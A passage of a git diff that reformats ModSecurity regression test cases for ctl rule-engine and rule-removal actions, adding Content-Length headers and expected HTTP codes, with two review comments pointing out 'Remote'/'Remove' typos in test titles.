] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=On,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (5)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (5)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=Off,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=DetectionOnly,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,log,phase:3,block,deny,status:302,ctl:RuleEngine=DetectionOnly\"" ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_by_id.json b/test/test-cases/regression/action-ctl_rule_remove_by_id.json index ba89561d57..afbd47cb98 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_by_id.json +++ b/test/test-cases/regression/action-ctl_rule_remove_by_id.json 
@@ -1,66 +1,90 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteById (1)", - "expected":{ - "debug_log": "Rule id: 1 was skipped due to a ruleRemoveById action..." + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteById (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule id: 1 was skipped due to a ruleRemoveById action...", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=1\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=1\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteById (2)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteById (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 
+ "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" + }, + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=123\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=123\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_by_tag.json b/test/test-cases/regression/action-ctl_rule_remove_by_tag.json index 6cf2923d58..ff48851a1b 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_by_tag.json +++ b/test/test-cases/regression/action-ctl_rule_remove_by_tag.json 
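Review bot: The titles `"Testing CtlRuleRemoteById (1)"` and `"Testing CtlRuleRemoteById (2)"` are carried over with "Remote", although the action under test is `ctl:ruleRemoveById`, so a search of test output for the action name misses both cases. As the title lines are rewritten in this hunk anyway, I would correct them to `"title": "Testing CtlRuleRemoveById (1)"` and `"title": "Testing CtlRuleRemoveById (2)"`. If anything outside this diff refers to the cases by title, such as a skip list, it would need the same rename.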
@@ -1,39 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Skipped due to a ruleRemoveByTag action." + "expected": { + "debug_log": "Skipped rule id '2'. Skipped due to a ruleRemoveByTag action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS:key \".\" \"id:4,ctl:ruleRemoveByTag=tag123\"", "SecRule ARGS \"@contains test1\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test2\" \"id:2,pass,t:trim,tag:tag123\"", 
@@ -41,40 +47,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Skipped due to a ruleRemoveByTag action." + "expected": { + "debug_log": "Skipped rule id '3'. Skipped due to a ruleRemoveByTag action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS:key \".\" \"id:4,ctl:ruleRemoveByTag=whee\"", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json b/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json index fce492bbac..ef9bd826f8 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json +++ b/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json 
@@ -1,167 +1,223 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (1)", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS:pwd\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS:pwd\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (2)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + 
"title": "Testing CtlRuleRemoveTargetById (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" + }, + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=123;ARGS:pwd\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=123;ARGS:pwd\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (3)", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": 
"text/xml", + "Content-Length": "0" + }, + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (4): uppercase `Referer` header", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (4): uppercase `Referer` header", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml", - "Referer": "This is an attack" + "Referer": "This is an attack", + "Content-Length": "0" }, - "uri":"/index.html", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", - "SecRule 
REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" + "uri": "/index.html", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", + "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (5): lowercase `Referer` header", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (5): lowercase `Referer` header", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml", - "referer": "This is an attack" + "referer": "This is an attack", + "Content-Length": "0" + }, + "uri": "/index.html", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/index.html", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", - "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME 
\"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", + "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json b/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json index fc696a5cb0..aba3df98b0 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json +++ b/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json 
@@ -1,99 +1,134 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (1)", - "expected":{ - "http_code": 200 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS',deny\"" + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (2)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:pwd" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + 
"port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" + }, + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:pwd", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", - "SecRule ARGS_NAMES \"@contains pwd\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", + "SecRule ARGS_NAMES \"@contains pwd\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (3)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" }, - 
"uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] } ] diff --git a/test/test-cases/regression/action-disruptive.json b/test/test-cases/regression/action-disruptive.json index da39b1c3bc..93c2d32cd8 100644 --- a/test/test-cases/regression/action-disruptive.json +++ b/test/test-cases/regression/action-disruptive.json 
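Review bot: The three rewritten titles in this hunk still read `CtlRuleRemoteTargetByTag`, while the action the rules exercise is `ctl:ruleRemoveTargetByTag`. Since every title line is being touched anyway, this is the cheap moment to correct them, e.g. `"title": "Testing CtlRuleRemoveTargetByTag (1)"`, and likewise for (2) and (3). As written, a search of test output for the action name will not find these cases.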
